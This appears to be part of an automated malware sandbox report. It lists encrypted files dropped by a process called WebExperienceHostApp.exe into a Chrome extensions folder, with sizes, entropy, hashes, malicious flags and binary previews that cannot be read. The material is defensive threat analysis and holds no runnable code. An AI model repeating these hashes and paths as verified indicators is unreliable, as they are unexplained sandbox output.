Encrypted:	true
SSDEEP:	1536:XIal/z8ddn/W3mCwkGXiy3KcjiNShkhKnh9JWrdqakoDU:XIu/Kn+6kGXi+jBIeh9ErQoDU
MD5:	5C1AE5B3B2B9CB775B39E0C1D256AF6A
SHA1:	007874F602898BB60F216A99181B4C7C4D481785
SHA-256:	702D224FB63A7B95502B8091B170A9D40514B1FF5DCB8C2096C2F91CD50E301B
SHA-512:	067E441963618C2F63B445F4AA21AF90C0EE6EA17485B740787BFFEAA7D6414C62C0BE2859BA887C871ECCBC776430D2773246B21A590FD6D87BFF01672D884B
Malicious:	true
Preview:	&...O..SZ.&PE...H..Ej1p,k..cg..'...........$......d.ST......P...o...h..b1 .f.......0...E....e.....S..W}.r...6.k....{.k...?..1..r.2%c..=>......7...m..r.jf{..;.].h......!.!T(We...i...mm6.f.(..g~.9.X.;.cV.8.M;...%.O......a.8.....v......2v..........R...`.t..o..%.7S.......9N..e....4..xb..i\.;B.".i\zR...h.N.X..$....1...{..p.g...<...A.Y.J\|2/fe...Y.{....4.%...2........q.6u.y.w..pp......L.u..6e.{@T....Dk./t...E..."P.;P..A...^.......\|v.p...B..W......4X.....D........g....V..?...pE..i.L$' .,@z..Q....v..n}Iws.r...c.......d..:y..X.=.P...8.W....,..`.......5.op....I.......yI.......G(Q..kZ...\.L.]5.?..x=..ZX...sK......a...i.........C.OE.N..........F.+.d.M.\|.."j.(..Gw........\|...:C...z......].......C...t...[.xQ]DB.&..n%......<...:D.q..k5)..;1B.@....>}L..;4..8....t._2..B.u.x1...w...]...'....../%..a5.O...QL..+%......p.<.\|..l...H.<......Y...'c..wM.....<..%..:57..S0.]d'..(.of..d......}....@..V%`f..$.G.Wk.e.T..}..4I..SYq.?y.R..\.....IT..+..^{...c..#.....#R7

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.60

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	56461
Entropy (8bit):	7.9973880039265675
Encrypted:	true
SSDEEP:	1536:CD2zlLmcFQF5cnac2DeJTwKHw0JVFA2p3N9hnxvsuNTOSr:CD2hLvev6a7CuKHPJ59dxvso
MD5:	7242A3104ACC425C97B62C10DA4E3A79
SHA1:	D2F43A6E2BCFB8296F1ED44CA98F1D42A25220C5
SHA-256:	C6E28AFB64F733D0B2F549E3FE0EB6BBED2B278434EA3CFD136569AD7B067356
SHA-512:	79CC62F151B90B998481B98FA01E8B64BF691D633B68FDC8E3D69EA89AA3CAB255682289905D75E13D3A15C80DE482C2C0F2B07CE8E7903E7D30F9DA5AB0FFEB
Malicious:	true
Preview:	>..=..F .X\wK<w.0.!S....Q..........G6...........r.=.j^,..M.....&..\3@.zrC.Q...5~....j..!.. ..uS.....~.c....P\|..Z.b..P./....G..._.t.#8.4K.JQ.C.T...p..!D?...^..].....X[..f..sz..2.eP..:r.NW...z.h.Oe..'D. O........H.D..$.e..$\.o.Z.%..+...IR....^v..P...PV...!3.[?9].o..v....p.].9...1.E.......i&.../..q..!..)6x!.....u)z5........O....Jp.gO..MI?.9.+.....MUaW5.t3.4..L......y...\|....=GR)....W....#..}T..e..x-lx......Tb..&1mn..n............Sz........q.R...0..y....E...A.d.......I......S.B.U...D...dX...dsu.7j.t...`..%`.O+z....C.f......WT..V.:..T%>G....[y..\|...8...[....4....P......grv._].M..`..D.U......A..._...z.e'Ye.9.d.vwz.....h@.v.M+J.q(....G>\|...?.Y...cFO.<.......2\.`.q4.D.".5.z/......wDS2U.......\|..R(..b.=...X.=K&Y...my.z....}X'v..~E.t.8jN!.ZDe7..'qX....NU.8..r).G...(/..].X"M..6..\L++..m........[r..]7+1.e.....`kh....08V....^k\..........8...k.@zi\|a...G.......).,G}...rk..?.Vp....+...Z4/YEF]..Q.1.{..}w.gOpU.;.8.t.R.AQ6..Y.}...K.%g.{......4

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.61

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	34458
Entropy (8bit):	7.994608566259596
Encrypted:	true
SSDEEP:	768:stH0VMSW6/XZqPtTg0NCEPpiiWtB0dkXir7Cr:WH06SDfcxgcCErWQ3K
MD5:	605B5BB77B2DF67A265DB36D7CCCB5AA
SHA1:	CA4CED1C839094E152B1D92DB49F68B5DBEB06FE
SHA-256:	885511827F06E769EBB3B5F94CA57EEB6AAEE2D220F2EF5EF704214439BDE4E5
SHA-512:	1CD218A976F8F9F9115829C6DB692525AA63C16887C0EE1B5A862AF53FD3B381F536E634D6156D740C23D9B3502752039D30A2148E6187311F9D08C442CE2D36
Malicious:	true
Preview:	.^.0...NB.."#..R3._@.9.Px_.N?5...=.h...q...Y%hf...a.w.L....oxU..I...~S....".<P.g..^....F.0lK.....U......f.:.....B).TSK.^...u.SRM..f4D......".._.u.C....ui.ZN-......L..[Q.o_36%.V:..U..8....Z.q..Z.wS..I'..<..f.t...`.......Q.........."&.q.."5.'.Q..38.q...F( ..3..-.\|&wz...P..%.....(....Hd...],...A.t..I)..K!7.E.r...i[.j.!A\|.Vp.X_.F?k. <w.0......%..\}.-.u..W`.}..._(.D....Y......5b./ WS......u....j?X>..1....m{39...>...P3.d...0.;e:.A...y.M%k#mG3.OE.5J\7..^__.:&.6..~...@...~..f\|....+-....6...]....U]'..N.Y..a.t.../q@..R.Vz.!.5(P....#.o.+i.n.3{.+. ..]!.}77.c."pz..T....A...>].2<&K......?.x&#..F.a&..D.}..K.E.y.@...8.3........nu.............R"x..KIK..h.t.........\|..!..R.f.US(.]..h..d...8s.......;..5.7..d....x.z\..4L..,P.Q..-....g.;."..Y\.........:,.FS.b.a..<....f......d...}..H.$...>.N......3..T...........@.9.."...#(\|.S..>."..}..eS........."....^Oy..\.5.1.:.y...jPK0.p.6.h.v..ksW.A.8.Og.K.:S&......}dBL..@.^..W.<.8..&..igC0..7'EN.LA....L.0< .v.J......o.cO!

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.62

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	96121
Entropy (8bit):	7.9979860190229894
Encrypted:	true
SSDEEP:	1536:RU+PC4brdG9pEmgUG5Al8jeEmMixaQ9y4VgpHie4rhWkMv+p0kj5BvlQAHHsJY1q:pKARmg95VeEmM9AgpH94oJvyvm2HsO1q
MD5:	8811940B4AE111BC3436759A042BBB2F
SHA1:	18382C1AC22D41C949E6365C5187BA9AE5646BAE
SHA-256:	FD7391BDA37AB38C9DD40FEC4108227D704EABC223612C2FAF15E54E4258DF62
SHA-512:	C95A961AB1CE706CB5E5670F953AACE419432A50D19822F0FCC5D76A729F9BEE652E26E82DFD4AB3ED2B49CDB099CAECEDFC92F7CBF9C6B82ED6C7D8E73C6F3D
Malicious:	true
Preview:	.G...lK".]+.j.-...i........e....Bu[.{...v$.........f.=...td].... ...Bi...U,......_.y1n3...t......(.....D;.z.&.P..!...6...,2V.v..0.F.R.+...--u,.{...oT........bk..sIRQ......;...3.q...e..<...1W.........7....6;.3.3.,a?SYz......'...a......@.[..n...M...O!,...H.4I.;..:...>..DRq. ...@8..i+........u.....b.T...9..Z...R.!....j.....$..5....y.[.....2h.v{=.d+.5.8.wk..62...[sI.H.f......+.......7..s.P.lg:......R....uJ#-.....D......l......~.3..pJ'S...v......i,a`e.T...<......C...R.....X.......G.....zY3.9d...g'!.E...I.KD6.9.."...~3\|.UZ..%...V"...?.Q....v\.?1a.wEn.......K.E..F..S-.Q./....E.s...m.t.l...q].5.r...dw..dP...?<..zqs^..F,.J.us&.......&._...xY\|..X.bh.l.4_v..B.[@>..qa...1.E.p`..bSF}.20.j..C.x..31.8......&%...@wIK...R`:......V...^_..L<.-.9...`..a..dU..!.~....l..`..u}G)c>A.^.d.L.........%!%.<.....Ag%..3....&.....@.....!`.d{..'b..X.&..;S.. ..`.%^.BKX..6.....X+...BW......Q\|<.y.c.E.L.1.%i^.).....n..z.n.....o....wo......D..1I..:..k..i.....'.U..H.d7..Z..K....B

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.63

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	35512
Entropy (8bit):	7.994321599527247
Encrypted:	true
SSDEEP:	768:oMd42bKNKN0IDSDcJs6kk6Lqdv3Du7PyjF7pRqa87Id2xs3Mk:oMd4VKQcJTkk6KrubyjFNoand2s3Mk
MD5:	0F582725109BFF986077F06A66BC3CFA
SHA1:	FD7C87BA4AF1E86A49517B0BEB7391F2431EDC30
SHA-256:	A992070D0852DFC3744F918A4BEE76059242E061CB64FD4E36D326A57721B9D1
SHA-512:	DCC551DF2EF59E9F1847ADDEF34F674881255EA2F7DF4A503620697FCB84AA1C9D76D9D39C3C8AC816613FB106A637A800C5E0B03274D85E5A8313506FBDBF19
Malicious:	true
Preview:	m.....5.S .![..=jI...<..Y....u..+...!...r@T..X.Bv...s...d.F..L?..@..$.........Ky'f.....S.n{...'.]..h..ucD.sL...B..@$rQ..'+b>..VM.P+............k....\..C..O....\(0..+L..?.E..>.+y...M..b]`8...-..pl....C..?...}G.nZ.....O(P.V#...<.[...p.R.>..OS.:.:\|.:..w1.j..R....b.lE.4e!.H.oRfjY..!..8.F...3.b=!x..}..0in..`.@....;..."b.1.......r...#.D.Z/......P.6.g.5..q.9..'+.N "..L.\~..{.N.Z.......qn..2hZU..C..<.PF..F?.'$s\.>.n.l..5..f.@.>...J0.....WA.nF.k...n.6......%....O.E.n..[?..T.....H.....Q..._@4..P...h...S!.=9Y..6....V7B.".,~j..I.....:B.8).I....&........NG.pP.K9...\|l3.u...&.Uf\..7.7...v`..L_....rk$.l........]4...MrxT..).[\|5.[.w... ...=o...D#.". .e6..x...0...N......E#....Q%.W(.6Z.P...(.X..ov...)%/........!`~.`...qh..)........s....A.-4....t0........j.k.`.X..a..+...z#..1/G.......B..y.g..l<..#.....s.>.\..\|.'.{....H...k...y..6.2...t-_K.8:J....*...(...p.B..b.1...H[.....G..y..s.K.......N....b.R.hk%a.NA..(\f...AD\....f0u.g +..R3.}....iW..)#.P...b....'

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.64

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	98730
Entropy (8bit):	7.998158650143007
Encrypted:	true
SSDEEP:	3072:mkrRUrMcuPu8qpmngaG0sJTIEmNkvmyvrpYYdMZ:mkrGInipXaGnJcEmNk+yTpjd6
MD5:	A5920A16E3A4D8BD258F31BDF311A50C
SHA1:	BEBB2736063952DD2079D7E2E3AEB509EFE06717
SHA-256:	1FBAD5686B5F0B61C2B1C81C15F66822A8B2AB9ECC0D1A85D939D3BF52E49BE4
SHA-512:	543322373B74BAB8848C061C3ADD3BEF86EFBCF5E78A0279F2DABFD1DF5892ED33C1CCC42A2957F6CC910D50ED21D65B506E1D8D431EC19CCEE9E1FB5827467F
Malicious:	true
Preview:	..b.......^.(...F.H~\......R........vu.,).>..7S... &.z.[..`i../... S.....~...K5...S...v.O..#,..2.Q.....)U..,!.U7...y..-...3..>.-KeG....tn"2.....D^C..;L.OJ..!......j...s.....H.g.yT...Z.p.D..SJ.....6.1[/._.+..GO..~..$..6N.....f...^...H....2..)m.0.'F...X.J...e..dt..].R......5..B[._.J9..X#\...h.GLP.9.d.^W..>4..M...0.P.13-..eW ...?.....6..+r......V..n5.>HN.U_2...M.D.w.y.B..n....I.B.D....7..~..0..+.M..-....Z..2..p...5>....M............T6;.......{...5....f.#1c."...%..y...J`....P=..^.D..Y.F.....&_....Y.(..S..4...!.5..t.....R.oA4@k,.2..m.2..o:.#...R<....`y.%ag....0.9 5.......!%@5.]..h..._....eAC..OGD...B-x...OdrA'.q.0=D.....G.B.~..PT..."j.......G..$d~.'...,..>....Iiy.+0..l...:;.;...Sl....h....U..B.%.......rr.Q[...kz..g.k.3%.6&t.n.c{.GY..../-..\.E.....T'.<..w...yz..;.0$..p....QJ..?K.]....Y............1......J...b...\.....5:..U.v..E ..R..9Z...Z..~wK.1w.l..^ ..{.....cG5...uI)lG c..M..3..C*u..qd..B.n....xOk...&..Y.PPN09.t.<x..Uc...{...z......PNd&.oWjh9

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.65

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	52378
Entropy (8bit):	7.996225673406002
Encrypted:	true
SSDEEP:	1536:Q1mh8GvTNy+JPVV2vHvKhOoy7o0YPwxH2EHv9:L8iy+p2fps9+H71
MD5:	1F9B104F05B24DF2BDD78E9AFB812697
SHA1:	CFCD528609AC1E21737FD95032676C3055F752EF
SHA-256:	525C53598F3ECC45724192BBD9FCCA0BE7404F561BB205B183E42F829C84F6E5
SHA-512:	9E0CAA49E9A4780B51DC12E08DAAD5A803FECA1D324F792E0754A5C26A5FD807E9BD6122D39D966214BD717CEBECA305DA20FC309EABFC22469073CD95D1B628
Malicious:	true
Preview:	c..4E.....uD..OD.l..w..:..........j.lD..z9.S...G...Cg%.../`...2Y#..N.\|U.n......T.z.;mS...9.W....G......>j..`.)10 ..,G..{.se.......Q.:.>..o.E......SK/.......gC.N..]!.w.<w6..0F..2.&....oG..y...V..Gp.3...P....#..YS...v...{...v.>D..W..A.....:....nU.6..y........O...k.J.@..Z.........`..I$V.\|.R....V.R......uN....=.._5A..tU).x..j.6r..x.e.$.j.?.......k.\...GC[....o...D..!.......e.=.....n.......E..SoB5...D2..1,..^7.....0...mHQ....hO...0tO.H...\.].t...:.=...Lo.;!..(...b..0;:@5.\|.A8N._........F....W8.X.D9P.."3u\..$32KE.^@.W..Z./.}.f?.bc.c....6.l8..b[q..e.R..~../...W..{...p..F... .C.......'.$.........\|..m.%.:...&.h...(G..>Y.........8..%.=...:jw...#........g.....u..Gn.*..".J.....Il.u..:...."..........S.x$.-...?.e.\|.9......}.2.$q....9..p..g..(mb.:.E...\.Dr.x5...!3..8d..b....;-...7..f<..w~....S. .......7p.......l......-{D...S...\|U..".xy...\|..g&....crGu$h.@6L.L..k....G..}6............I.A.,9.}.....J7r......g..5H.......?Q..Q....../$..3.....Ib.0G.......>.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.66

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	35271
Entropy (8bit):	7.995110529395509
Encrypted:	true
SSDEEP:	768:f2R9YAR/wPTFXpB0stVwEltGTcRErDurukRdH+dsMBa21CmtBgBybv0:fEbkT5pBx4TcRCurmdmNmtB0yQ
MD5:	8079074AB97D798FFE52192503592B0B
SHA1:	30EFF32FAE6DD482B8D48CDB3FFCB2412545795F
SHA-256:	A35D45B62DDA3D4C9AD2F2EF2072F1B0D3F55D6394F72A8CAA359C05EF0D06DA
SHA-512:	94383F2F5115B7D017696848900EDCB77385FA46F419A8A8EFA73D9E29D9A44E6BEF0BB65ABAA861C80976489AB62D00C53ECF31B80F1080E2562B86CCF78597
Malicious:	true
Preview:	h.G.]7%.~..X.......Se......L...0.D...U...8...`..f..B-E...9m...bF.l..A....Z3..z.a.Z...\...yQ...~]#X.R.i....iT.....!.......(..2Ty.?'v...."\y..b.l"..&;zE../..g....y...#.#".8.N....x.S.=....H.n3?Jn....m...V..Ipy,..P.g...OO...7..@p.?..>...HCK6......(_.L\.Dyf.K....7.Q......j\|.....[=&.3...N0...{21..T...y.....$Z.T.Q...#c8..g..v...Y...A.......O.Lm..K.....r.......g.-.{...4e.^]:."..{e.......e&.O.o.>.d..F.H..~E.L...%..D.I..T..55@B....^."s.\|.^...;.,.:..}'v......<........X..p.mN..r.......}:..........s...nb@ ..i+8.a...[>..L..pq...jh....9.....1.46.8.(.!.....eOh$\|'0....a...E..Ac....yQ..OK..9.m.6~....^.u.B...P.....`."y.X.m...?.....)C?,........%.U[...u./.^#...YD....t....&.G......Y.R!.&^q..M.@Z..!...u>b'.#.fW....U.4(.\)>......G.h.<.<..+.YVz./.~..t.A0.D..A3#j..}..<{(,FV..b[.;d3/eg.a.Ki..{...e........J.,..}...P..M...C..kX.j....\|.>.....T4&"D..r.z.."..?,h.E>.?...F" .ofPz.V`Yer...~8..9.yF(.....%Q...G....mK\..j..V...?.Cs..U..N.L.*.e...UZ.L..y.5.z.E.>O8I.hK.R.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.67

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	68283
Entropy (8bit):	7.997488389296204
Encrypted:	true
SSDEEP:	1536:mfU349V6OAVolG0EQkDLby/Ey4XAfwNVr8qnvKQpkCh:R49V6ODlYNfTy4XLNVrlv/pkCh
MD5:	35177F73CFC118BF96AD2EBEADE20122
SHA1:	EF0CC47A5547F02098B15FEC671DC264127C6A0D
SHA-256:	EEEFBC5F582D597C827E72BF3290BBD581CCD55E8E0E21C8A2671C22CC74E22A
SHA-512:	1AA83A49F96A2DEC198034E92D4591078D17804F529346C1A0C9B5747A416CC555220038CB910325137458AE6670D8E945E6BA20F0A59D86DE66C3EBB481A476
Malicious:	true
Preview:	I.C+\..........9.(p0...b5(...\|....O..)..?.4.........\|mz.Ez.'.\G.F...z..aH2..\eZ&.D.....Sa+.I0.^.4....]`H=Qn9...D.O...Bb"....X..6.+jhUA..F...x...=..2..3"r......2..I.%..c.a [...u/s.S..].2.x...j.........#..y.A.k%.`..K:.....@..V.t..+...TM.'QVI..l.]...uk..i..@#_.:.}..,q-p.K..".Kd...7k...Q5.D@.p.Z.F%.....%....=..SC...Do.be8P8.?..Gp..eK...gk.....O.b.<..,...\...Bj.....-...~..U....vTE..@].t..P.d.-$.{m...Td.k..$dc.....YC..:.'x..vRA.H..'....Va...4....?U..3/............E.V..+.~[<.@.........ct..K\...R.%@...YC.We4.4.AF....J.....).xa.W.q_...t..(...4.U.Se.P.N.\|..}..P..\....g.....DV.{....'.z...g. ....!........f)..td.F#....%./....KRt...9..#gJ......{...Cz..l...o......W.4.R.]........d<.....d........Y......N(.L ~H.+.:....g..vmF..M+g.F..<...w..S#.]..x..&-..J..`.. ..H....k../..6.x.fI.kn......>.Y%)....y9....f.].0.`.A.J`.j..9q....g-....Y.T...<*.18.&.O4 0..U........:.....}..!.U......n...Z..+O. n..<.`.Z...&....U9{....#2."..X-L..P\|./X..y.Y<.@....Z7...R...`....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.68

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	105124
Entropy (8bit):	7.998467327363212
Encrypted:	true
SSDEEP:	3072:NcDRBOWwGNketKJCxKUE/+SSkDuGwIgXdQSDpK:NcD/OW7NkU0UO+LouJhXd1g
MD5:	F431E45DBDBF13968726272A8EF4A5AB
SHA1:	1D2BD43B4DA393DA112AE1C58997316A49C7E910
SHA-256:	9E215300DCB001B6EEFC03A84225D482590BC3AC69F85D90EA8E3C9529018AE9
SHA-512:	1DD618A46CF77963DCFB80275F66B9E5D70FBA4F73543BAA3BA40085C5EC534DEEDF2EA757E793A7219C45EE572F9D3A574C54B381925A986BCD6EA9E0ABFC55
Malicious:	true
Preview:	....i.K.n4..?s>.!........E....H....a.A.+....>.... ....._l..fv..Y...:3...q...2.y.i......-....Y'v.<M.~n.(......5...[....D..ao.....8.....7..................N....."....V.M..c....A.%.^-.3.X.H.8...r.T.].3..wxV.........V(../x.2N]...l.<..<.0N6b4..qx.......s.IV."....Xtxz.w..@=PaW<[.Q@.e.R;.S.Mg>...8?....."..3..wL......W....jq.E..5xti....z.(.l.Y.-#.e...[......+.e+..w..k..".[".x.v.^.^!HrV.S.z_.t.+.<.....t@:.]..f...H.2...\Z...pz.....,-^..3s...[d...6.9.Ux....iH.wk..{....NJ..fWK..K.......\|.t..-Y.....t.T.4.Q....`.R...MScl......O.K6zD/..uge.@8.zs...C.C.6.....S.W.{.....:..!@.^8g.1.l..,\Q.. ........E...~...1...=@M=...g...+a.P.....\3.j....l....mY.U..Dh.u...P...5...$...p//o.."...g.\|.9..q....^... .#8.8.YAR}..t.?..L...Jn......#K.w.+.C.\|.... X.N4..[.q...%.t.Zt..9w../.H.).:..P..:.n....a{...t.V$W..m.7..~.=..2.k.....U.~......S..S..po..EyCc.VZ.m..m.t[_..Y e......;o.on.}...x..S..q^D............d....cr..~.g..f....3...k.W.;..s.:....~b..{h..!.!."R.....2....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.69

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	56374
Entropy (8bit):	7.997015079015027
Encrypted:	true
SSDEEP:	1536:ZUaJoie7dKT1Sid+sS9Itt8wFrFbTJuSpoB+:OH8T15dvS+j8uRzoB+
MD5:	1CE724F1D2F8C62763775BAE2A19FA6C
SHA1:	929DBF551587D5786E9287848126229B2E498DE1
SHA-256:	C69D3D0D15A2414BC71CC45E1ED47D3821D505B6CD089A6DCA5B2CC8F4869081
SHA-512:	3867B205E6034210124B4D0F16448490E7DA6B634ABD4F4AF8B98A879A34E04E18985F97C583556EC21313B000C11C47204546DAA834CC0CCA3B426507D45155
Malicious:	true
Preview:	.;.........z..m.x.U}......tfj^..K.........CD....5Gk..D.:......w.g.....O.....z...;.......3...T..g.t...i...l".....i.t.v.W^.&.=..iw...j-IA.....F...//......\|............Jg.....b..vn}..?c.j.....v2... .PP2.gcVcU..Y.)........... ..w..)..).....y.,H......d#....>.dJ>.c. .]"<.h.\|..iUn.r`.M......d.....`y.s.1...'.)..L....:....xb..R+..w.q.p.-.^.</...{V2h5I5.g..kT.R.m...-B...m;..U..W_.....v.....KZT..qh..c.Z.X.n?.B.....`g.....I..w...HV.....J..HB....?..A8m..r..k.z.D.Ba..;....A.kR,.=...... ...vJv..(..j......w.....9.]\|;qT..L. .............k.{u....Y.7..5.....M.b...IG#.v3R...%....;.B....\|Y..=...K.z.$7^-.+...."..,..EW......fC,Qr.C...`.K...:sr.....D...m..V.0)E.......@.m..F...\..a.....%....6..h..q.X...+=.\|{........Y.0...y^....m..f..^..T%.l>....?.c...")...W....5...I...d...,..4....(...2J....\|t\|.. .fj.Q....zd..%.)-.TI.uz;.........I.p.i.........^;.C.>j..J#...w.6.\|.u_....bg..)X..lkrT.l.t..4....~..BE?.:.ka.,M._..#..!.0..~...4r;?mu...b..~o ...Z..w\|...6..`S}ly.K.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.7

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	89443
Entropy (8bit):	7.9979139839442555
Encrypted:	true
SSDEEP:	1536:uH7NXfr6rZZ1pNQjHMh/JoccM/Gzwecdqu8VDEV0B3WuG6/hOd4Ij9iqwvBLmRRn:O7NP+Z1fQbMNJhf/G8eAqFGCB3P8b9ig
MD5:	640CF1CA12E3FDF0E19ACB8ADACEEE55
SHA1:	11F36F8EA97B7E0036C5C571490F58AFD6024C47
SHA-256:	45B5FDB6E0234FA884594441ECC9A5B7091DEA0D77021938F16F9FC7B93D34F6
SHA-512:	9DA4B5BE8D303491176CA5AC12F8FCF71A5AAA10ECFE8997E857D18EA8876E10110000A412C187655756F73FD544051C32A3AB120F663E001941241BB8D636BF
Malicious:	true
Preview:	%.Sf...1t.:.?...........6.r'.. ._...x.3.M.C...b..c-...9Y...{}rz...W...sQ.ol....(.V..x...{LH(......)f..a..e.&}.u?.@.....".;.d.....in. .]N.....g.3.,..6..Gt....i8......l{......@..J..f.....c...o.F...a..,...5w......g.-&...@.]...O...4#.T.E.f.N........}/.......Iyio.LR..C->Bh.j.H).r.T...@S..$....~......l....<....{LX.....9.D.._K.B[.....n...$V...CH.6....$.Z..~1.e.of.N...TY..E.V...E.]..D.z.U..=.}:.\|.$...]]g^P..t.....jX......5..Q.C..E.=....\..i%.'{u.&b.E...^...&^u).}..o.W... .{S.5..'A@D.\|.k.?..N{.R...Y).&......9..].....V...?.B..s.^T....D.[.)..w.\....Us/j..#......1...P.X.<9r....!p...R.\......84..]..)w{.l......V.;....l).&.~..=y....h$..d.w.....v.E.%{....%....uEy.. 8R......9....3.,b.....R...eq.......p.u.AN7...2-.2h..F...P.N0^.FB.&I~..a...,..(.N8.k..L9\|x.H...P.......CPV...../.X-o.a\|..,e..^..#q.fjI7.J?e..u,...N......K.195....>.'.eg.#..6b.....;2T.'...i....X6.=..9.>.=....:^..#{.w.X./\|..R..j.\|3..Nl..n..N....,-..tTx.q.....r: @{S....Bb..'X..J..,...PVy.k;.K

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.70

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	37237
Entropy (8bit):	7.9946004510102116
Encrypted:	true
SSDEEP:	768:Lrt9dwBFEdL8GtVM5TJQdpuHA7gm3SYb//iT:d9SLYL8GbQFQB7gmCYb//iT
MD5:	33C92B526406EFA85AB5B7EFE3C8F774
SHA1:	4E4C789EF38126110F9B4EA8C655DAC2DAE4DAB5
SHA-256:	6140165A94FAD47C72CDC6DF946C6CF49895E2B03EEE7C356F5AE5A9B913964A
SHA-512:	209281CDD0A5C2B3E34F3B20FAC63D1ACB1563D36B857551652269B8A033DE9036D7F245E65424960C2C0DEA45644AAE8B7B26FB59F98608277B9570844C2EDD
Malicious:	true
Preview:	.[..]....P;....g'../..>.@=..q_....X..............l.....K..y...K....8J.6.z.=.-......k......M1.....s.iN.j....fC{...._=....:WJD....`lV.%.EAN....)PC.......x.m.z`+...<..^d..>.0......7.R^.4...o}...m.. .....^..h..b6.W...A]]..d.L.......Q...k.a.;I.~.,)..@._dAc......;.fU..'...>.........p..?....%.O.[..W.j...&...6W.n.=-T._....c...Le...N=....D..8T;.B.]..5.5q..k.u.........TO..[...8..q...N....>....."..!.A.t..=..d.`.9...(...9.h.._.zs.7..\.P..oh@..X..63..L...h...D..BLu.MT.j..`$.^....l..t$V..Q..f.....s.lY..u_..{.ns..F..n\|.c.....O'...fBC.(.e\|.....d.e.......A..f.L..:.].ku.:@i.~.....k5."-W..B.w.......C..W..s.. ..:.r.\..<#<...K0.Ev.E\.. ..nL..!.q.fO.:N.N...d.A.g......... #Z.1.Cw...r..as..k..#..............B2....I............i.....5..P\|:.cK..3...4d...V..w.fO.M.l.1.QeBL\|..J..e.).k.Wi.e.$.O....%.5j..L..+.A.6N.-.:...s.r..U%I.^.....f.^..*.^..zA....r..HB..........B..X.$...b5z.,q......!E.....@......kR.4A..It}...nQ...s.....?..H.f...O.....HJG/...p.;..V........BT..Vi.5..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.71

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100030
Entropy (8bit):	7.998056554555185
Encrypted:	true
SSDEEP:	1536:d2zlCeo1t6OmuqE/B1ZpTmCa4S8clhppQHBXBewFUpuDHehCPPdD99FT1ucX:gfAqEp5rclhpGRXF2uDMC3dBj1ucX
MD5:	729D88487AAC4AF729C540798A12AEF1
SHA1:	7FA1514910376234D7D08162632056BEDDADF545
SHA-256:	39FD0A911F378B31EE05EA0D17C54A6377CFE8913AD8345A981A135C9E275526
SHA-512:	7CADA77A38A036E93455166C929CD6EE5CC7FA953D56B472F4ADD62192127E9C27A59408D12705AE97A395D69C8EEA3EE98D0C509D842CE59C538C0DEAB86EE0
Malicious:	true
Preview:	.5.R...8/...eq.fk...,\|.\.2.}...<H..6.o..!.b..pe..}.X.:B-....)...YD;.Z;.b......Q"...7.?.........R..1Wt.._.3......g.$O..!......S.)\|\|.86....[/.n...^...\|$...Yx..Z.../......yyU.x....A._...%.....p.8.o$..Yz..y.....7..C.....y..F./..XK....v.. _O,.wQ...\>94${........T!b.t.+;rK.....+.d.@_K..._.5#...9..,=.M..Jn..#....sf.....V:.... .PPGJba.........q......c/..3..cV....~x...X.XQ<H..0 ..k....G..q..g.qX..f..Z..>.3.5(/.I.oq.\..\1.a5........#.........T..m ..X.xZ..RA..x;D.B.8..v5G.R"...L..C6...9..92lw'.3..Y.-Jh.fY..A...Q..A.....@.;^....Vp.b..@.P...5.....f.B1.`r=w..p..e...X...Qx....D&.~..e.....a.z.D..\......X>....$.o..;..:...4...... ......L......t...w.rg..s@......=...N......&.S.Us.......j"..)P+..F........)6...D.H.C..pL.......(.P.XX.[..=X.F.v<.uG.._p../..E`q.S..O.,..`Y.#.Q....A..&...f....G...s].....0..V7.X.Jt............l..z.....VBFi......\|.....TI.t.........&.7s..N.4.E.!.&..-...`qtB..m...j.O...C..T.{eKJVV...Z.D.rvi..7..b....7.y..V..a~....W.p{.Y..rS.n.8..

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.72

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31722
Entropy (8bit):	7.995285181282859
Encrypted:	true
SSDEEP:	768:g+MVmtBfa1xKkbCy1AkKwaTZ2uWQNaCsW:g+tMxR3UZyQsCsW
MD5:	4CE2489178807770BCC16A577DAB619D
